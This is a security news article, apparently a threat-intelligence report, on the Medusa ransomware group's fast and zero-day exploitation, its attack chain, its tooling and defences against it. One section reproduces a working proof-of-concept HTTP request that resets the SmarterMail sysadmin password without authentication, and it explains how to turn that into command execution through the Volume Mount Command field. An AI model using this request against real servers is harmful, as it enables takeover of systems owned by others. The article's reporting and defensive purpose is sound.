Microsoft has documented a sharp escalation in tempo from the Medusa ransomware operation, which it tracks as Storm-1175. The financially motivated group is now weaponizing newly disclosed vulnerabilities within a day of their publication — and in several intrusions, exploiting zero-day flaws as much as a week before they became public. A ransomware-as-a-service crew active since June 2021, Medusa has breached more than 300 critical-infrastructure organizations as of February 2025, with healthcare providers absorbing a disproportionate share of the damage.

Inside Storm-1175

Medusa runs a double-extortion model: operators encrypt a victim's data and steal a copy first, then threaten to leak the files publicly unless the ransom is paid. That two-sided pressure undercuts the value of restoring from backups, which is why the group gravitates toward high-value targets that can tolerate little downtime. Its observed victims cluster in:

  • Healthcare organizations
  • Educational institutions
  • Professional services firms
  • Financial sector entities

Recent activity has been concentrated in Australia, the United Kingdom, and the United States. Hospitals and insurers — chronically short on patching capacity and unable to absorb outages — make especially soft targets for an adversary that can find and exploit exposed assets faster than defenders can react.

Exploitation measured in hours, not weeks

What sets Medusa apart from much of the ransomware field is raw speed. Microsoft's threat intelligence team watched Storm-1175 go from initial access through to post-compromise activity — data theft and ransomware deployment included — inside a single day, and in some cases the full chain wrapped up in hours.

Across the past three years the group has leveraged at least 16 separate vulnerabilities in widely deployed enterprise software, including:

  • Microsoft Exchange
  • Ivanti Connect Secure and Policy Secure
  • ConnectWise ScreenConnect
  • JetBrains TeamCity
  • SAP NetWeaver
  • CrushFTP and GoAnywhere MFT
  • SmarterMail and BeyondTrust
  • Papercut and SimpleHelp

In one telling example, the operators were exploiting a critical SAP NetWeaver flaw just one day after its public disclosure on April 24, 2025 — leaving defenders effectively no time to patch ahead of attack.

Striking before disclosure

The most concerning detail in Microsoft's reporting is Medusa's willingness to burn zero-days. Storm-1175 has exploited at least three confirmed zero-day vulnerabilities, two of which are named:

  • CVE-2026-23760 — a zero-day in SmarterMail
  • CVE-2025-10035 — a zero-day in GoAnywhere MFT

In some intrusions the group was already exploiting these flaws seven days before they were disclosed publicly. That pre-disclosure access implies Storm-1175 is either conducting its own vulnerability research or sourcing intelligence ahead of public release — a capability normally associated with nation-state operators rather than criminal crews. The group has also gone after Linux systems, including Oracle WebLogic deployments, chaining multiple defects together to reach remote code execution.

The SmarterMail zero-day (CVE-2026-23760)

The SmarterMail flaw is a clean example of how a single authentication weakness becomes full host compromise. According to the CVE.org record, published January 22, 2026, SmarterTools SmarterMail builds prior to build 9511 contain an authentication bypass in the password reset API.

The root cause, detailed in a public proof-of-concept by MaxMnMl, is that the force-reset-password endpoint accepts anonymous requests and never validates an existing password or a reset token when resetting system administrator accounts. An unauthenticated attacker can therefore overwrite the sysadmin password outright — the only prerequisite is knowing the admin account's username.

Proof of concept

Resetting the system administrator password is a single request:


POST /api/v1/auth/force-reset-password HTTP/1.1
Host: xxxxxxx:9998
Content-Type: application/json
Content-Length: 145

{"IsSysAdmin":"true",
"OldPassword":"watever",
"Username":"admin",
"NewPassword":"NewPassword123!@#",
"ConfirmPassword": "NewPassword123!@#"}

A successful reset returns a response confirming the change:


{
"username":"",
"errorCode":"",
"errorData":"",
"debugInfo":"check1\\r\\ncheck2\\r\\ncheck3\\r\\ncheck4.2\\r\\ncheck5.2\\r\\ncheck6.2\\r\\ncheck7.2\\r\\ncheck8.2\\r\\n",
"success":true,
"resultCode":200
}

Once logged in as system administrator, the attacker reaches code execution through built-in functionality: supplying an arbitrary command in the Volume Mount Command field. The underlying operating system runs that command, and when the configuration is saved it executes immediately — giving the attacker full remote code execution on the host.

Detection

SmarterMail instances can be fingerprinted with title='SmarterMail' or html:'SmarterMail'. ProjectDiscovery publishes a detection check for this issue as a Nuclei template. Note that the GoAnywhere MFT zero-day (CVE-2025-10035) is named in Microsoft's reporting but no public reproduction detail is available for it here — treat it as a patch-now item rather than something to test against blind.

The attack chain

After establishing a foothold — typically via phishing or vulnerability exploitation — Storm-1175 runs a consistent, well-drilled sequence:

  • Drops a web shell or remote-access payload for persistence
  • Conducts reconnaissance and moves laterally across the network
  • Alters firewall rules to keep remote access open
  • Harvests and exfiltrates credentials, including those held by Veeam backup software
  • Runs file-encrypting ransomware against every reachable system

Microsoft highlighted one particularly damaging step: once the operators hold administrator credentials, they run a script to recover passwords stored inside Veeam backup software. Those recovered credentials let the group pivot to any remote hosts reachable through Veeam, sharply widening the blast radius of the encryption stage.

Living off the land

To stay under the radar and pass as routine administration, Medusa leans heavily on living-off-the-land binaries (LOLBins) and dual-use tooling already present on most enterprise networks. The observed toolkit includes:

  • PowerShell and PsExec for remote execution
  • Cloudflare Tunnels to disguise command-and-control traffic
  • RDP and assorted RMM tools for lateral movement
  • PDQ Deployer for distributing payloads
  • Impacket and Mimikatz for credential theft
  • Bandizip and Rclone for staging and exfiltrating data

Because these are legitimate tools, signature-based detection tends to miss them — defenders need anomaly- and behavior-driven monitoring to catch the abuse.

More than an outage

"If unchecked, the impact is bigger than a single encrypted network segment. Medusa is built for double extortion, so the ransom threat is not just downtime — it's the risk of public data exposure and downstream fallout like regulatory penalties, partner distrust, and long tail fraud from stolen data." — Pete Luban, Field CISO, AttackIQ

For regulated industries the risk compounds. A healthcare or financial victim faces not only operational disruption from encryption but the prospect of HIPAA violations, GDPR fines, and lasting reputational harm if patient or financial records are leaked. Medusa has shown it will follow through on those threats, which makes negotiation and recovery far messier than a conventional encrypt-only incident.

Defending against Medusa

Given Storm-1175's speed, defenders have to work proactively. Recommended measures include:

  • Continuous asset inventory — keep an accurate, current map of internal and internet-facing systems, prioritizing exposed assets.
  • Aggressive patching — patch internet-facing systems first and subscribe to threat intel feeds to spot zero-day exploitation early.
  • Credential hygiene — audit backup software configuration, Veeam included, so stored credentials can't be trivially harvested.
  • Network segmentation — contain lateral movement by segmenting critical systems and enforcing least-privilege access.
  • Behavioral monitoring — tune EDR and SIEM to flag LOLBin abuse, unusual RDP sessions, and anomalous Rclone or PowerShell activity.
  • Incident response readiness — test IR plans and maintain offline, immutable backups that cannot be reached through Veeam or similar platforms.

Bottom line

Medusa marks a new tier of criminal threat — pairing near nation-state vulnerability research with an industrialized RaaS pipeline. Its ability to exploit zero-days before disclosure, compress intrusions to a few hours, and single out the organizations least able to weather disruption makes it a defining threat heading into 2025 and beyond. For healthcare, finance, and education in particular, perimeter exposure should be treated as an emergency: assume patch windows are measured in hours, not weeks, and invest in proactive threat hunting accordingly.